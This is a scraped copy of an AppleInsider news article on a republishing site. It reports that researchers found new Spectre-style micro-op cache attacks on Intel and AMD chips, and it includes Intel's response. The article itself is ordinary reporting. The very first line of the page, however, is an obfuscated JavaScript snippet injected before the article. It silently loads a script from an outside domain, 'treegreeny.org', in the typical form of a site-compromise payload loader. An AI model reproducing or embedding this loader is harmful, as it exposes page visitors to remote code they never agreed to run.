;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Spectre comes back from the dead to haunt Intel chips | AppleInsider - TechFire
More
    HomeAppleSpectre comes back from the dead to haunt Intel chips | AppleInsider

    Spectre comes back from the dead to haunt Intel chips | AppleInsider

    [ad_1]

    Security researchers have found new versions of chip flaws affecting Intel and AMD processors that get around existing mitigations for Spectre attacks, resurrecting vulnerabilities that may affect Intel-based Macs.

    In 2018, an Intel chip kernel flaw was found that allowed attackers to gain access to protected data, which could include passwords and application keys. While patches and mitigations were put in place to block the so-called “Spectre” attacks from happening, researchers have determined the efforts aren’t enough to prevent the attacks entirely.

    In a paper published by researchers from the University of Virginia and the University of California, at least three new versions of Spectre attacks have been found affecting micro-op caches in Intel and AMD processors.

    Crucially, the three methods determined by the researchers get around previous Spectre defences that prevented such data leaks. This means current processors are vulnerable to the Spectre-like attacks, despite their anti-Spectre protections.

    The researchers have already disclosed their research to Intel and AMD, reports Phoronix, but so far there have yet to be any kernel patches or microcode updates distributed by either side ahead of the public disclosure.

    Part of the problem is that the fix may introduce a “much greater performance penalty” than previous mitigations. Example fixes include flushing the micro-op cache at domain crossings, or to instigate privelige level-based partitioning of caches.

    While the disclosure is quite damning to Intel and AMD, the high difficulty of pulling off an attack makes it unlikely that it will affect many people at all. To do so, the malware would have to thread the needle of getting past all existing security measures included in operating systems, before even attempting to use any of the vulnerabilities in the first place.

    At this time, it is unknown if the vulnerabilities affect Intel-based Macs, but it is likely that they are at a minimal risk of attack. With Apple’s move to Apple Silicon and its home-grown architecture, new Macs aren’t likely to be directly affected by the new discovery.

    That being said, Apple did introduce fixes to combat Spectre and “Meltdown,” another chip flaw discovered at the same time in 2018. Mitigations were issued in macOS, iOS, and tvOS, indicating Apple’s A-series chips were also vulnerable at the time.

    The Spectre headache was a long-running problem for Intel. More Spectre-style vulnerabilities were disclosed in a second wave in mid-2018.

    An inevitable class-action lawsuit against Apple was attempted, claiming the company’s handling of the vulnerabilities had slowed down A-series chip products. By January 2019, the case was dismissed for a lack of standing.

    Update May 3, 3:44 PM ET Intel believes that there are already sufficient protections with existing mitigations, despite the researchers differing on this point.

    “Intel reviewed the report and informed researchers that existing mitigations were not being bypassed and that this scenario is addressed in our secure coding guidance,” Intel said in a statement. “Software following our guidance already have protections against incidental channels including the UOP cache incidental channel. No new mitigations or guidance are needed.”

    Stay on top of all Apple news right from your HomePod. Say, “Hey, Siri, play AppleInsider,” and you’ll get latest AppleInsider Podcast. Or ask your HomePod mini for “AppleInsider Daily” instead and you’ll hear a fast update direct from our news team. And, if you’re interested in Apple-centric home automation, say “Hey, Siri, play HomeKit Insider,” and you’ll be listening to our newest specialized podcast in moments.

    [ad_2]

    Source link

    Md Kashif Ali
    Md Kashif Ali
    Hey Guys Its Kashif, Founder of Tech Fire. I spend most of my free time creating content for my YouTube channel and this website. I started my YouTube channel at age 15 and my goal was to teach people what they can do with their gadgets.
    RELATED ARTICLES

    LEAVE A REPLY

    Please enter your comment!
    Please enter your name here

    This site uses Akismet to reduce spam. Learn how your comment data is processed.

    - Advertisment -

    Most Popular